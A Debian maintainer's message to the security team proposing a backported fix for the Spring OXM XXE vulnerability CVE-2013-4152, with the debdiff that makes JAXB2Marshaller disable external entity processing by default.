Dear security team,
I have prepared a new version of libspring-java to fix CVE-2013-4152
(#720902) by backporting the related upstream patch [1]. I'm attaching
the debdiff against the version of libspring-java in stable. You can
also find an updated package at mentors.debian.net for an initial
review. [2]
Please let me know if the changes qualify for a stable-security release.
The affected libspring-oxm-java binary package has no further
reverse-dependencies. The problem type is local and remote. It is
possible to conduct DDoS attacks via XXE injections. Please refer to the
full disclosure (References) for additional information.
Description
===========
The Spring OXM wrapper did not expose any property for disabling entity
resolution when using the JAXB unmarshaller. There are four possible
source implementations passed to the unmarshaller:
DOMSource
StAXSource
SAXSource
StreamSource
For a DOMSource, the XML has already been parsed by user code and that
code is responsible for protecting against XXE.
For a StAXSource, the XMLStreamReader has already been created by user
code and that code is responsible for protecting against XXE.
For SAXSource and StreamSource instances, Spring processed external
entities by default thereby creating this vulnerability.
The issue was resolved by disabling external entity processing by
default and adding an option to enable it for those users that need to
use this feature when processing XML from a trusted source.
It was also identified that Spring MVC processed user provided XML with
JAXB in combination with a StAX XMLInputFactory without disabling
external entity resolution. External entity resolution has been disabled
in this case.
References
==========
http://seclists.org/bugtraq/2013/Aug/154
http://seclists.org/fulldisclosure/2013/Nov/14
http://www.gopivotal.com/security/cve-2013-4152
Regards,
Markus
[1] https://github.com/SpringSource/spring-framework/pull/317
[2]
http://mentors.debian.net/debian/pool/main/libs/libspring-java/libspring-java_3.0.6.RELEASE-6+deb7u1.dsc
diff -Nru libspring-java-3.0.6.RELEASE/debian/changelog libspring-java-3.0.6.RELEASE/debian/changelog
--- libspring-java-3.0.6.RELEASE/debian/changelog 2012-06-21 03:29:11.000000000 +0200
+++ libspring-java-3.0.6.RELEASE/debian/changelog 2013-12-07 11:51:53.000000000 +0100
@@ -1,3 +1,17 @@
+libspring-java (3.0.6.RELEASE-6+deb7u1) wheezy-security; urgency=high
+
+ * Team upload.
+ * Fix CVE-2013-4152.
+ - New patch: Add-processExternalEntities-to-JAXB2Marshaller.patch.
+ - Now by default external XML entities are not processed when
+ unmarshalling. Processing of external entities will only be
+ enabled/disabled when the source passed to the unmarshaller is a
+ SAXSource or StreamSource. It has no effect for DOMSource or StAXSource
+ instances.
+ - (Closes: #720902)
+
+ -- Markus Koschany <apo@gambaru.de> Sat, 07 Dec 2013 11:51:46 +0100
+
libspring-java (3.0.6.RELEASE-6) unstable; urgency=low
* Add optional B-D on openjdk-7-jdk.
diff -Nru libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch
--- libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch 1970-01-01 01:00:00.000000000 +0100
+++ libspring-java-3.0.6.RELEASE/debian/patches/Add-processExternalEntities-to-JAXB2Marshaller.patch 2013-12-07 11:38:15.000000000 +0100
@@ -0,0 +1,116 @@
+From: Markus Koschany <apo@gambaru.de>
+Date: Thu, 5 Dec 2013 10:59:47 +0100
+Subject: Add 'processExternalEntities to JAXB2Marshaller
+
+Added 'processExternalEntities' property to the JAXB2Marshaller, which
+indicates whether external XML entities are processed when
+unmarshalling.
+
+Default is false, meaning that external entities are not resolved.
+Processing of external entities will only be enabled/disabled when the
+Source} passed to #unmarshal(Source) is a SAXSource or StreamSource. It
+has no effect for DOMSource or StAXSource instances.
+
+Original patch by Arjen Poutsma.
+
+Bug: http://bugs.debian.org/720902
+---
+ .../springframework/oxm/jaxb/Jaxb2Marshaller.java | 56 ++++++++++++++++++++++
+ 1 file changed, 56 insertions(+)
+
+diff --git a/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java b/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java
+index 890ce18..1b3412d 100644
+--- a/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java
++++ b/projects/org.springframework.oxm/src/main/java/org/springframework/oxm/jaxb/Jaxb2Marshaller.java
+@@ -61,7 +61,9 @@ import javax.xml.stream.XMLStreamReader;
+ import javax.xml.stream.XMLStreamWriter;
+ import javax.xml.transform.Result;
+ import javax.xml.transform.Source;
++import javax.xml.transform.dom.DOMSource;
+ import javax.xml.transform.sax.SAXSource;
++import javax.xml.transform.stream.StreamSource;
+ import javax.xml.validation.Schema;
+ import javax.xml.validation.SchemaFactory;
+
+@@ -158,6 +160,8 @@ public class Jaxb2Marshaller
+
+ private boolean lazyInit = false;
+
++ private boolean processExternalEntities = false;
++
+
+ /**
+ * Set multiple JAXB context paths. The given array of context paths is converted to a
+@@ -301,6 +305,18 @@ public class Jaxb2Marshaller
+ this.lazyInit = lazyInit;
+ }
+
++ /**
++ * Indicates whether external XML entities are processed when unmarshalling.
++ * <p>Default is {@code false}, meaning that external entities are not resolved.
++ * Note that processing of external entities will only be enabled/disabled when the
++ * {@code Source} passed to {@link #unmarshal(Source)} is a {@link SAXSource} or
++ * {@link StreamSource}. It has no effect for {@link DOMSource} or {@link StAXSource}
++ * instances.
++ */
++ public void setProcessExternalEntities(boolean processExternalEntities) {
++ this.processExternalEntities = processExternalEntities;
++ }
++
+ public void setBeanClassLoader(ClassLoader classLoader) {
+ this.beanClassLoader = classLoader;
+ }
+@@ -569,6 +585,8 @@ public class Jaxb2Marshaller
+ }
+
+ public Object unmarshal(Source source, MimeContainer mimeContainer) throws XmlMappingException {
++ source = processSource(source);
++
+ try {
+ Unmarshaller unmarshaller = createUnmarshaller();
+ if (this.mtomEnabled && mimeContainer != null) {
+@@ -616,6 +634,44 @@ public class Jaxb2Marshaller
+ }
+ }
+
++ private Source processSource(Source source) {
++ if (StaxUtils.isStaxSource(source) || source instanceof DOMSource) {
++ return source;
++ }
++
++ XMLReader xmlReader = null;
++ InputSource inputSource = null;
++
++ if (source instanceof SAXSource) {
++ SAXSource saxSource = (SAXSource) source;
++ xmlReader = saxSource.getXMLReader();
++ inputSource = saxSource.getInputSource();
++ }
++ else if (source instanceof StreamSource) {
++ StreamSource streamSource = (StreamSource) source;
++ if (streamSource.getInputStream() != null) {
++ inputSource = new InputSource(streamSource.getInputStream());
++ }
++ else if (streamSource.getReader() != null) {
++ inputSource = new InputSource(streamSource.getReader());
++ }
++ }
++
++ try {
++ if (xmlReader == null) {
++ xmlReader = XMLReaderFactory.createXMLReader();
++ }
++ xmlReader.setFeature("http://xml.org/sax/features/external-general-entities";,
++ this.processExternalEntities);
++
++ return new SAXSource(xmlReader, inputSource);
++ }
++ catch (SAXException ex) {
++ logger.warn("Processing of external entities could not be disabled", ex);
++ return source;
++ }
++ }
++
+ /**
+ * Template method that can be overridden by concrete JAXB marshallers for custom initialization behavior.
+ * Gets called after creation of JAXB <code>Marshaller</code>, and after the respective properties have been set.
diff -Nru libspring-java-3.0.6.RELEASE/debian/patches/series libspring-java-3.0.6.RELEASE/debian/patches/series
--- libspring-java-3.0.6.RELEASE/debian/patches/series 2012-01-14 17:40:31.000000000 +0100
+++ libspring-java-3.0.6.RELEASE/debian/patches/series 2013-12-07 11:38:15.000000000 +0100
@@ -7,3 +7,4 @@
0008_jpa_20_api.diff
0009_hibernate_validator_41.diff
0010_velocity_17.diff
+Add-processExternalEntities-to-JAXB2Marshaller.patch
Attachment:
signature.asc
Description: OpenPGP digital signature